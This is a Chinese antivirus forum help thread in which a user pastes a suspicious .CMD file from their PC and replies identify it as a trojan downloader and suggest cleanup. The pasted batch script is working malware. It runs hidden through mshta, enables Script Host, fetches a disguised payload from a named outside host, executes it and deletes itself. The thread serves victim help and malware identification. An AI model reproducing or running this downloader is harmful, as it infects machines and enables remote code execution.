瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 为什么我的机器用着的时候就会出现FINDSTR.EXE应用程序无效的情况呢!

1   1  /  1  页   跳转

[求助] 为什么我的机器用着的时候就会出现FINDSTR.EXE应用程序无效的情况呢!

为什么我的机器用着的时候就会出现FINDSTR.EXE应用程序无效的情况呢!

还有就是我的文件夹里面有很多不明的以.CMD为后缀的文件!现打开一个贴上其内容!请大侠们
@@@@@@@@@@@@@@@@@@@@@@@@我是分割线@@@@@我是分割线@@@@@@@@@@

@echo off
cd /d %tmp%
set shel=msh&if "%1"=="kyo_PE-win32shell_ping" goto hidedl
%shel%ta vbscript:createobject("wscript.shell").run("""%~nx0"" kyo_PE-win32shell_ping",0)(window.close)&&exit帮忙分析!

附件: 样本.rar (2009-12-4 17:00:21, 18.34 K)
该附件被下载次数 377


:hidedl
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "Script" "Host\Settings /v Enabled /t REG_DWORD /d 1 /f
rundll32 setupapi,InstallHinfSection DefaultInstall 128 %windir%\\inf\\wsh.inf®svr32 scrrun.dll urlmon.dll shdocvw.dll jscript.dll vbscript.dll /s
rd /s /q "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5"
start %shel%ta.exe vbscript:createobject("wscript.shell").run("""%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"" http://cadgs0906.hzserver23.gxidc.com/z/QQOPlatform.htm",0)(window.close)
:wait
ping 127.0.0.1 -n 15
for /f "tokens=1,2,3,4,5,6 delims= " %%1 in ('dir "%systemdrive%\Documents and Settings\QQOPlatform[1].gif" /s /a^|findstr /i "Content.IE5"') do set way=%%1 %%2 %%3 %%4 %%5 %%6
ren "%way%\QQOPlatform[1].gif" winupdata.log
if exist "%way%\winupdata.log" (copy "%way%\winupdata.log" "%systemdrive%\Documents and Settings\All Users\Application Data\winupdata.log" /y) else (goto wait)
ping 127.0.0.1 -n 2
rd /s /q "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5"
call "%systemdrive%\Documents and Settings\All Users\Application Data\winupdata.log"
del "%systemdrive%\Documents and Settings\All Users\Application Data\winupdata.log"
del %0
@@@@@@@@我是分割线@@@@@我是分割线@@@@@@@@


用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
分享到:
gototop
 

回复:为什么我的机器用着的时候就会出现FINDSTR.EXE应用程序无效的情况呢!

恭喜你下,已经被下了木马,还的BAT+VBS动态下载。。。。

建议将你截图的那个文件夹清理干净,同时做好一下几点工作

右键IE--属性--删除COOKIES/删除文件/所有脱机文件,确定
清空下历史记录

接着,开始--运行--键入%TEMP%--删除里面能删除的文件

然后扫描个SRENG日志来分析下。。。

最好需要配合冰刃手动查杀
gototop
 

回复:为什么我的机器用着的时候就会出现FINDSTR.EXE应用程序无效的情况呢!

后门程序,用卡卡上网助手清理一下系统。
共同交流,共同进步。
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT